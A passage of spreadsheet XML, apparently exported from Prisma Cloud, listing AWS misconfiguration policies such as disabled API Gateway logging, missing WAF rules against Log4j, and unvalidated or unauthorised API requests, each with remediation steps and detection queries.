      </c>
      <c r="AK1569" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1570">
      <c r="A1570" t="inlineStr">
        <is>
          <t>NYDFS 23 CRR-NY 500.0, Microsoft Cloud Security Benchmark v1, NYDFS 23 CRR-NY 500.0, CSA CCM v4.0.12</t>
        </is>
      </c>
      <c r="B1570" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1570" s="2" t="inlineStr"/>
      <c r="D1570" t="inlineStr"/>
      <c r="E1570" t="inlineStr"/>
      <c r="F1570" t="inlineStr"/>
      <c r="G1570" t="b">
        <v>1</v>
      </c>
      <c r="H15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70" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1570" t="inlineStr">
        <is>
          <t>aws-apigateway</t>
        </is>
      </c>
      <c r="K1570" t="inlineStr">
        <is>
          <t>AWS API Gateway REST API execution logging disabled</t>
        </is>
      </c>
      <c r="L1570" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1570" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1570" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1570" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1570" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1570" t="inlineStr">
        <is>
          <t>A&amp;A</t>
        </is>
      </c>
      <c r="R1570" t="inlineStr">
        <is>
          <t>A&amp;A-03</t>
        </is>
      </c>
      <c r="S1570" t="inlineStr"/>
      <c r="T1570" t="b">
        <v>0</v>
      </c>
      <c r="U1570" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1570" t="inlineStr">
        <is>
          <t>aws-apigateway-get-stages</t>
        </is>
      </c>
      <c r="W1570" t="inlineStr">
        <is>
          <t>This policy identifies AWS API Gateway REST API's that have disabled execution logging in their stages.
AWS API Gateway REST API is a service for creating and managing RESTful APIs integrated with backend services like Lambda and HTTP endpoints. Execution logs log all the API activity logs to CloudWatch, which helps in incident response, security and compliance, troubleshooting, and monitoring.
It is recommended to enable logging on the API Gateway REST API to track API activity.</t>
        </is>
      </c>
      <c r="X1570" t="inlineStr">
        <is>
          <t>To enable execution logging on API Gateway Rest API, follow the below steps:
1. Sign in to the AWS console. Navigate to the API Gateway dashboard
2. Under the navigation page, select the 'APIs'
3. Select the REST API reported; under the navigation page, select 'Stages'
4. Select a stage and click on 'Edit' under the 'Logs and tracing' section
5. Under the 'Edit logs and tracing' page, select a value other than 'Off' under the 'CloudWatch logs' dropdown.
6. Click on 'Save'.
7. Repeat this process for all the stages of the reported REST API.</t>
        </is>
      </c>
      <c r="Y1570" t="inlineStr"/>
      <c r="Z1570" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-apigateway-get-stages' AND json.rule = methodSettings.[*].loggingLevel does not exist or methodSettings.[*].loggingLevel equal ignore case off as X; config from cloud.resource where api.name = 'aws-apigateway-get-rest-apis' as Y; filter ' $.X.restApi equal ignore case $.Y.id '; show Y;</t>
        </is>
      </c>
      <c r="AA1570" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1570" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1570" t="inlineStr">
        <is>
          <t>PC-AWS-API-1262</t>
        </is>
      </c>
      <c r="AD1570" t="b">
        <v>1</v>
      </c>
      <c r="AE1570" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1570" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG15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70" t="inlineStr">
        <is>
          <t>b5d59925-89c7-41b7-8c90-452bd429bb5f</t>
        </is>
      </c>
      <c r="AI1570" t="inlineStr">
        <is>
          <t>e34952fe-5756-4cb0-95b8-fbf7bf76466f</t>
        </is>
      </c>
      <c r="AJ1570" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1570" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1571">
      <c r="A1571" t="inlineStr">
        <is>
          <t>CIS Controls v8, CIS Controls v8.1, Secure Controls Framework (SCF) - 2024.2, kfirdaus AWS Account-CS, Copy of ACSC Information Security Manual (ISM)-clone, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, CSA CCM v4.0.12, NIST 800-53 Rev 5, Microsoft Cloud Security Benchmark v1, HITRUST CSF v.11.2.0, FFIEC, PCI DSS v4.0, ISO/IEC 27001:2022, ACSC Information Security Manual (ISM), CSA CCM v.4.0.6, NYDFS 23 CRR-NY 500.0, CIS Controls v7.1, ISO/IEC 27001:2022, Australian Cyber Security Centre (ACSC) Essential Eight - Level 1, kfirdaus AWS Account-CS, RBI Baseline Cyber Security and Resilience Requirements, PCI DSS v4.0, ACSC Information Security Manual (ISM), PCI DSS v4.0, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, ISO/IEC 27001:2022, Copy of CIS Controls v8, Australian Cyber Security Centre (ACSC) Essential Eight - Level 1, ISO 27002:2022, Insurance Regulatory And Development Authority Of India, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), ITSG-33, kashan ACSC Information Security Manual (ISM), MLPS 2.0 (Level 2), Microsoft Cloud Security Benchmark v1, TX-RAMP Level 2, PCI DSS v4.0, ISO/IEC 27001:2022, NIST CSF v2.0, CRI Profile v1.2.1, Secure Controls Framework (SCF) - 2022.2.1, Secure Controls Framework (SCF) - 2024.2, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CRI Profile v2.0, Copy of ACSC Information Security Manual (ISM)-clone, Copy of ACSC Information Security Manual (ISM)-clone, NIST CSF v2.0, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), Australian Energy Sector Cyber Security Framework (AESCSF), kfirdaus AWS Account-CS, kashan ACSC Information Security Manual (ISM), TX-RAMP Level 1, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, ACSC Information Security Manual (ISM), kashan ACSC Information Security Manual (ISM), Sarbanes Oxley Act (SOX), MLPS 2.0 (Level 2), DORA, CSA CCM v4.0.12, Secure Controls Framework (SCF) - 2024.2</t>
        </is>
      </c>
      <c r="B1571" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1571" s="2" t="inlineStr"/>
      <c r="D1571" t="inlineStr"/>
      <c r="E1571" t="inlineStr"/>
      <c r="F1571" t="inlineStr"/>
      <c r="G1571" t="b">
        <v>1</v>
      </c>
      <c r="H15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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1571" t="inlineStr">
        <is>
          <t>aws-apigateway</t>
        </is>
      </c>
      <c r="K1571" t="inlineStr">
        <is>
          <t>AWS API Gateway Rest API attached WAFv2 WebACL is not configured with AMR for Log4j Vulnerability</t>
        </is>
      </c>
      <c r="L1571" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1571" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1571" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1571" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1571" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1571" t="inlineStr">
        <is>
          <t>Guidelines for Networking</t>
        </is>
      </c>
      <c r="R1571" t="inlineStr">
        <is>
          <t>ISM-1030</t>
        </is>
      </c>
      <c r="S1571" t="inlineStr"/>
      <c r="T1571" t="b">
        <v>0</v>
      </c>
      <c r="U1571" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1571" t="inlineStr">
        <is>
          <t>aws-apigateway-get-stages</t>
        </is>
      </c>
      <c r="W1571" t="inlineStr">
        <is>
          <t>This policy identifies AWS API Gateway Rest API attached with WAFv2 WebACL which are not configured with AWS Managed Rules (AMR) for Log4j Vulnerability. As per the guidelines given by AWS, API Gateway Rest API attached with WAFv2 WebACL should be configured with AWS Managed Rules (AMR) AWSManagedRulesKnownBadInputsRuleSet and AWSManagedRulesAnonymousIpList to protect from Log4j Vulnerability (CVE-2021-44228).
For more information please refer below URL,
https://aws.amazon.com/security/security-bulletins/AWS-2021-006/</t>
        </is>
      </c>
      <c r="X1571" t="inlineStr">
        <is>
          <t>1. Sign in to the AWS console
2. Go to the API Gateway console
3. Click on the reported API Gateway REST API
4. In the Stages pane, choose the name of the stage
5. In the Stage Editor pane, choose the Settings tab
6. Note down the associated AWS WAF web ACL
7. Go to the noted WAF web ACL in AWS WAF &amp; Shield Service
8. Under 'Rules' tab click on 'Add rules' and select 'Add managed rule groups'
9. Under 'AWS managed rule groups' enable 'Anonymous IP list' and 'Known bad inputs'
10. Click on 'Add rules'</t>
        </is>
      </c>
      <c r="Y1571" t="inlineStr"/>
      <c r="Z1571" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-apigateway-get-stages' AND json.rule = webAclArn is not empty as X; config from cloud.resource where api.name = 'aws-waf-v2-web-acl-resource' AND json.rule = (webACL.postProcessFirewallManagerRuleGroups.firewallManagerStatement.name does not contain AWSManagedRulesAnonymousIpList or webACL.postProcessFirewallManagerRuleGroups.firewallManagerStatement.name does not contain AWSManagedRulesKnownBadInputsRuleSet) and NOT ( webACL.rules[*].statement.managedRuleGroupStatement.name contains AWSManagedRulesAnonymousIpList and webACL.rules[*].statement.managedRuleGroupStatement.name contains AWSManagedRulesKnownBadInputsRuleSet ) as Y; filter '$.Y.webACL.arn equals $.X.webAclArn'; show X;</t>
        </is>
      </c>
      <c r="AA1571" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1571" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1571" t="inlineStr">
        <is>
          <t>PC-AWS-API-833</t>
        </is>
      </c>
      <c r="AD1571" t="b">
        <v>1</v>
      </c>
      <c r="AE1571" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1571" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG15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1" t="inlineStr">
        <is>
          <t>8d65d3b7-75f2-4628-b07b-ab574041dbdf</t>
        </is>
      </c>
      <c r="AI1571" t="inlineStr">
        <is>
          <t>599de04f-e7d5-4254-8e18-72a46f389125</t>
        </is>
      </c>
      <c r="AJ1571" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1571" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1572">
      <c r="A1572" t="inlineStr"/>
      <c r="B1572" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1572" s="2" t="inlineStr"/>
      <c r="D1572" t="inlineStr"/>
      <c r="E1572" t="inlineStr"/>
      <c r="F1572" t="inlineStr"/>
      <c r="G1572" t="b">
        <v>0</v>
      </c>
      <c r="H15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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1572" t="inlineStr">
        <is>
          <t>aws-apigateway</t>
        </is>
      </c>
      <c r="K1572" t="inlineStr">
        <is>
          <t>llatorre -  AWS API gateway request parameter is not validated v3</t>
        </is>
      </c>
      <c r="L1572" t="inlineStr"/>
      <c r="M1572" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1572" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1572" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1572" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1572" t="inlineStr"/>
      <c r="R1572" t="inlineStr"/>
      <c r="S1572" t="inlineStr"/>
      <c r="T1572" t="b">
        <v>1</v>
      </c>
      <c r="U1572" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1572" t="inlineStr">
        <is>
          <t>aws-apigateway-method</t>
        </is>
      </c>
      <c r="W1572" t="inlineStr"/>
      <c r="X1572" t="inlineStr">
        <is>
          <t>1. Login to AWS management console
2. Navigate to 'API Gateway' service
3. Select the region for which the API gateway is reported.
4. Find the alerted API by the API gateway ID which is the first part of reported resource and click on it
5. Navigate to the reported method
6. Click on the clickable link of 'Method Request'
7. Under section ‘Settings' ,click on the pencil symbol for 'Request Validator' field
8. From the dropdown, Select the type of Request Validator as per the requirement
9. Click on the tick symbol next to it to save the changes</t>
        </is>
      </c>
      <c r="Y1572" t="inlineStr">
        <is>
          <t>'description': '',
'cliScriptTemplate': 'aws apigateway create-request-validator --rest-api-id  $resourceId  --region $region'</t>
        </is>
      </c>
      <c r="Z1572" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-apigateway-method' AND json.rule = requestValidatorId does not exist as X; config from cloud.resource where api.name = 'aws-apigateway-get-rest-apis' as Y; filter '$.X.restApi contains $.Y.id'; show Y;</t>
        </is>
      </c>
      <c r="AA1572" t="inlineStr">
        <is>
          <t>Marius Banica</t>
        </is>
      </c>
      <c r="AB1572" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1572" t="inlineStr"/>
      <c r="AD1572" t="b">
        <v>0</v>
      </c>
      <c r="AE1572" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1572" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG15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2" t="inlineStr">
        <is>
          <t>08ad97f9-dc5e-4b83-b14e-926f13d97324</t>
        </is>
      </c>
      <c r="AI1572" t="inlineStr">
        <is>
          <t>80c1d84d-a5f5-40bb-b84a-2047e05c46ff</t>
        </is>
      </c>
      <c r="AJ1572" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1572" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1573">
      <c r="A1573" t="inlineStr"/>
      <c r="B1573" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1573" s="2" t="inlineStr"/>
      <c r="D1573" t="inlineStr"/>
      <c r="E1573" t="inlineStr"/>
      <c r="F1573" t="inlineStr"/>
      <c r="G1573" t="b">
        <v>0</v>
      </c>
      <c r="H15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3" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1573" t="inlineStr">
        <is>
          <t>aws-apigateway</t>
        </is>
      </c>
      <c r="K1573" t="inlineStr">
        <is>
          <t>llatorre -  AWS API gateway request parameter is not validated</t>
        </is>
      </c>
      <c r="L1573" t="inlineStr"/>
      <c r="M1573" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1573" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1573" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1573" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1573" t="inlineStr"/>
      <c r="R1573" t="inlineStr"/>
      <c r="S1573" t="inlineStr"/>
      <c r="T1573" t="b">
        <v>1</v>
      </c>
      <c r="U1573" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1573" t="inlineStr">
        <is>
          <t>aws-apigateway-method</t>
        </is>
      </c>
      <c r="W1573" t="inlineStr">
        <is>
          <t>This policy identifies the AWS API gateways for which the request parameters are not validated. When the validation fails, API Gateway fails the request, returns a 400 error response to the caller, and publishes the validation results in CloudWatch Logs. It is recommended to perform basic validation of an API request before proceeding with the integration request to block unvalidated calls to the backend.</t>
        </is>
      </c>
      <c r="X1573" t="inlineStr">
        <is>
          <t>1. Login to AWS management console
2. Navigate to 'API Gateway' service
3. Select the region for which the API gateway is reported.
4. Find the alerted API by the API gateway ID which is the first part of reported resource and click on it
5. Navigate to the reported method
6. Click on the clickable link of 'Method Request'
7. Under section ‘Settings' ,click on the pencil symbol for 'Request Validator' field
8. From the dropdown, Select the type of Request Validator as per the requirement
9. Click on the tick symbol next to it to save the changes</t>
        </is>
      </c>
      <c r="Y1573" t="inlineStr">
        <is>
          <t>'description': '',
'cliScriptTemplate': 'aws apigateway create-request-validator --rest-api-id  $resourceId  --region $region'</t>
        </is>
      </c>
      <c r="Z1573" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-apigateway-method' AND json.rule = requestValidatorId does not exist</t>
        </is>
      </c>
      <c r="AA1573" t="inlineStr">
        <is>
          <t>Marius Banica</t>
        </is>
      </c>
      <c r="AB1573" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1573" t="inlineStr"/>
      <c r="AD1573" t="b">
        <v>0</v>
      </c>
      <c r="AE1573" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1573" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG15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3" t="inlineStr">
        <is>
          <t>cc8933d7-252d-4151-b660-3f3a64ee9f2c</t>
        </is>
      </c>
      <c r="AI1573" t="inlineStr">
        <is>
          <t>382a9838-eb65-4d34-a4ad-3f0fd0d795ab</t>
        </is>
      </c>
      <c r="AJ1573" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1573" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1574">
      <c r="A1574" t="inlineStr">
        <is>
          <t>ISO/IEC 27017:2015, FFIEC, APRA (CPS 234) Information Security, ACSC Information Security Manual (ISM), Secure Controls Framework (SCF) - 2024.2, APRA (CPS 234) Information Security, APRA (CPS 234) Information Security, Cybersecurity Maturity Model Certification (CMMC) v.1.02, NIST SP 800-172, Copy of ACSC Information Security Manual (ISM)-clone, ISO/IEC 27017:2015, CSA CCM v.4.0.1, CIS Controls v8, APRA (CPS 234) Information Security, CIS Controls v8.1, Secure Controls Framework (SCF) - 2024.2, MAS TRM 2021, MAS TRM 2021, ISO/IEC 27017:2015, ISO/IEC 27017:2015, HIPAA, RBI Baseline Cyber Security and Resilience Requirements, CIS Controls v7.1, NIST CSF, SOC 2, kashan ACSC Information Security Manual (ISM), TX-RAMP Level 1, ISO/IEC 27017:2015, GDPR, CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, NIST 800-53 Rev 5, CSA CCM v.4.0.1, CHC HITRUST CSF v.9.6.0, ISO/IEC 27002:2013, PCI DSS v3.2.1, ISO/IEC 27002:2013, ISO/IEC 27017:2015, Secure Controls Framework (SCF) - 2022.2.1, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, CSA CCM v.4.0.1, ISO/IEC 27002:2013, ISO/IEC 27001:2022, SOC 2, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, Secure Controls Framework (SCF) - 2024.2, Secure Controls Framework (SCF) - 2022.2.1, HITRUST CSF v.11.2.0, HIPAA, HITRUST CSF v.11.2.0, CSA CCM v.4.0.6, HIPAA, APRA (CPS 234) Information Security, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, CIS Controls v8.1, ITSG-33, Copy of CIS Controls v8, HITRUST v.9.4.2 [Deprecated], SOC 2, kfirdaus AWS Account-CS, CRI Profile v2.0, CSA CCM v4.0.12, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, HITRUST CSF v.9.6.0, TX-RAMP Level 2, Sarbanes Oxley Act (SOX), NIST SP 800-171 Revision 2, CHC HITRUST CSF v.9.6.0, HITRUST CSF v.9.6.0, NIST SP 800-172, Brazilian Data Protection Law (LGPD), CSA CCM v.4.0.1, MLPS 2.0 (Level 2), NIST CSF v2.0, CSA CCM v.4.0.1, ISO/IEC 27018:2019</t>
        </is>
      </c>
      <c r="B1574" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1574" s="2" t="inlineStr"/>
      <c r="D1574" t="inlineStr"/>
      <c r="E1574" t="inlineStr"/>
      <c r="F1574" t="inlineStr"/>
      <c r="G1574" t="b">
        <v>1</v>
      </c>
      <c r="H15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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1574" t="inlineStr">
        <is>
          <t>aws-apigateway</t>
        </is>
      </c>
      <c r="K1574" t="inlineStr">
        <is>
          <t>AWS API gateway request authorisation is not set</t>
        </is>
      </c>
      <c r="L1574" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1574" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1574" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1574" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1574" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1574" t="inlineStr">
        <is>
          <t>Control Category: 06.0</t>
        </is>
      </c>
      <c r="R1574" t="inlineStr">
        <is>
          <t>06.h</t>
        </is>
      </c>
      <c r="S1574" t="inlineStr"/>
      <c r="T1574" t="b">
        <v>0</v>
      </c>
      <c r="U1574" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1574" t="inlineStr">
        <is>
          <t>aws-apigateway-method</t>
        </is>
      </c>
      <c r="W1574" t="inlineStr">
        <is>
          <t>This policy identifies AWS API Gateways of protocol type REST for which the request authorisation is not set. The method request for API gateways takes the client input that is passed to the back end through the integration request. It is recommended to add authorization type to each of the method to add a layer of protection.</t>
        </is>
      </c>
      <c r="X1574" t="inlineStr">
        <is>
          <t>1. Login to AWS management console
2. Navigate to 'API Gateway' service
3. Select the region for which the API gateway is reported.
4. Find the alerted API by the API gateway ID which is the first part of reported resource and click on it
5. Navigate to the reported method
6. Click on the clickable link of 'Method Request'
7. Under section 'Settings', click on the pencil symbol for 'Authorization' field
8. From the dropdown, Select the type of Authorization as per the requirement 
9. Click on the tick symbol next to it to save the changes</t>
        </is>
      </c>
      <c r="Y1574" t="inlineStr"/>
      <c r="Z1574" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-apigateway-method' AND json.rule = authorizationType contains NONE</t>
        </is>
      </c>
      <c r="AA1574" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1574" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1574" t="inlineStr">
        <is>
          <t>PC-AWS-API-542</t>
        </is>
      </c>
      <c r="AD1574" t="b">
        <v>1</v>
      </c>
      <c r="AE1574" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1574" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG15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4" t="inlineStr">
        <is>
          <t>3bc575db-9c1c-4ae3-aeb1-107989ef6fca</t>
        </is>
      </c>
      <c r="AI1574" t="inlineStr">
        <is>
          <t>378d9d08-956f-4c63-b058-0d7784486adc</t>
        </is>
      </c>
      <c r="AJ1574" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1574" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1575">
      <c r="A1575" t="inlineStr">
        <is>
          <t>ISO/IEC 27017:2015, MLPS 2.0 (Level 2), APRA (CPS 234) Information Security, Secure Controls Framework (SCF) - 2024.2, Cybersecurity Maturity Model Certification (CMMC) v.1.02, NIST SP 800-172, ISO/IEC 27017:2015, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, MAS TRM 2021, MAS TRM 2021, ISO/IEC 27017:2015, ISO/IEC 27017:2015, Secure Controls Framework (SCF) - 2024.2, NIST CSF, ISO/IEC 27017:2015, CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, CSA CCM v.4.0.1, ISO/IEC 27002:2013, PCI DSS v3.2.1, ISO/IEC 27002:2013, ISO/IEC 27017:2015, CSA CCM v.4.0.1, Secure Controls Framework (SCF) - 2022.2.1, ISO/IEC 27002:2013, CSA CCM v.4.0.1, ISO/IEC 27002:2013, APRA (CPS 234) Information Security, HITRUST v.9.4.2 [Deprecated], ISO/IEC 27002:2013, Brazilian Data Protection Law (LGPD), Sarbanes Oxley Act (SOX), NIST SP 800-171 Revision 2, NIST SP 800-172, CSA CCM v.4.0.1, CSA CCM v.4.0.1, ISO/IEC 27018:2019</t>
        </is>
      </c>
      <c r="B1575" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1575" s="2" t="inlineStr"/>
      <c r="D1575" t="inlineStr"/>
      <c r="E1575" t="inlineStr"/>
      <c r="F1575" t="inlineStr"/>
      <c r="G1575" t="b">
        <v>1</v>
      </c>
      <c r="H15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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1575" t="inlineStr">
        <is>
          <t>aws-apigateway</t>
        </is>
      </c>
      <c r="K1575" t="inlineStr">
        <is>
          <t>AWS API gateway request parameter is not validated</t>
        </is>
      </c>
      <c r="L1575" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1575" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1575" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1575" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1575" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q1575" t="inlineStr">
        <is>
          <t>12</t>
        </is>
      </c>
      <c r="R1575" t="inlineStr">
        <is>
          <t>12.1.2</t>
        </is>
      </c>
      <c r="S1575" t="inlineStr"/>
      <c r="T1575" t="b">
        <v>0</v>
      </c>
      <c r="U1575" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1575" t="inlineStr">
        <is>
          <t>aws-apigateway-method</t>
        </is>
      </c>
      <c r="W1575" t="inlineStr">
        <is>
          <t>This policy identifies the AWS API gateways for which the request parameters are not validated. When the validation fails, API Gateway fails the request, returns a 400 error response to the caller, and publishes the validation results in CloudWatch Logs. It is recommended to perform basic validation of an API request before proceeding with the integration request to block unvalidated calls to the backend.</t>
        </is>
      </c>
      <c r="X1575" t="inlineStr">
        <is>
          <t>1. Login to AWS management console
2. Navigate to 'API Gateway' service
3. Select the region for which the API gateway is reported.
4. Find the alerted API by the API gateway ID which is the first part of reported resource and click on it
5. Navigate to the reported method
6. Click on the clickable link of 'Method Request'
7. Under section ‘Settings' ,click on the pencil symbol for 'Request Validator' field
8. From the dropdown, Select the type of Request Validator as per the requirement
9. Click on the tick symbol next to it to save the changes
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-2-53
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-2-53</t>
        </is>
      </c>
      <c r="Y1575" t="inlineStr"/>
      <c r="Z1575" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-apigateway-method' AND json.rule = requestValidatorId does not exist 
{"category":"General","resourceTypes":["aws_api_gateway_method"]}</t>
        </is>
      </c>
      <c r="AA1575" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1575" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1575" t="inlineStr">
        <is>
          <t>PC-AWS-API-543-CKV2_AWS_53</t>
        </is>
      </c>
      <c r="AD1575" t="b">
        <v>1</v>
      </c>
      <c r="AE1575" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1575" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG15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5" t="inlineStr">
        <is>
          <t>fccd881f-26d1-485d-a742-3602afe72035</t>
        </is>
      </c>
      <c r="AI1575" t="inlineStr">
        <is>
          <t>382a9838-eb65-4d34-a4ad-3f0fd0d795ab</t>
        </is>
      </c>
      <c r="AJ1575" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1575" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1576">
      <c r="A1576" t="inlineStr"/>
      <c r="B1576" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1576" s="2" t="inlineStr"/>
      <c r="D1576" t="inlineStr"/>
      <c r="E1576" t="inlineStr"/>
      <c r="F1576" t="inlineStr"/>
      <c r="G1576" t="b">
        <v>1</v>
      </c>
      <c r="H15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6" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1576" t="inlineStr">
        <is>
          <t>aws-application</t>
        </is>
      </c>
      <c r="K1576" t="inlineStr">
        <is>
          <t>AWS DynamoDB table Auto Scaling not enabled</t>
        </is>
      </c>
      <c r="L1576" t="inlineStr">
        <is>
